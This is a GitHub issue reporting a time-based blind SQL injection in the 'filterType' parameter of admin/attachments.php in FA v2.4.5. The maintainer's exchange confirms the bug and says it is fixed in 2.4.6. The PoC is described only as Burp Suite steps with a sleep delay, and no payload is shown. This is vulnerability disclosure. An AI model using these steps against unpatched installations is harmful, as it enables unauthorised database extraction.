New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Time Based Blind SQL Injection in "filterType" Parameter #37
Comments
|
I cannot replicate the problem testing current version on ubuntu 16.04,
mysql 5.5.62 and php 7.0.33.
What FA/mysql/php version did you test on?
Did you find any other point where the vulnerability exists? The field
is sanitized in exactly the same manner as in all other inputs in FA, so
if the problem really appears on some special server configuration, it
should appear in many places of FA interface.
|
|
I'm using PHP/7.2.4, 10.1.31-MariaDB, XAMPP version 3.2.2 in Windows 10 64bit. Did you change the user_name_entry_field and password field according to your configuration ? Can i know what you get ? |
|
I'm Using Version FA v2.4.5 Build 06.12.2018 |
|
Finally I reproduced the problem (the PoC didn't worked as I overlooked you marked filterType POST with asterisks). The problem has been fixed in just released 2.4.6 version. |
|
Thank you.. |
Vulnerability Name: Time Based Blind SQL Injection in "filterType" Parameter
Vulnerability Description: filterType Parameter in admin/attachments.php file suffer from the Blind SQL Injection, By using the an attacker can grab the Backend Database Information
PoC:
Step1: Open the Burp Suite go to the Repeater tab copy the above Contents
Step2: Click on the right side penlike icon configure the your ipaddress and port address and click save
Step3: Click on "Go" Button you will see the response cause the time delay 20 seconds.
Step4: Change the sleep function value what ever you want and click on "go" you will see the time delay what ever you give value to the sleep function.
PoC Video:
Mitigation: See the OWASP SQL Injection Prevention sheet on this https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
The text was updated successfully, but these errors were encountered: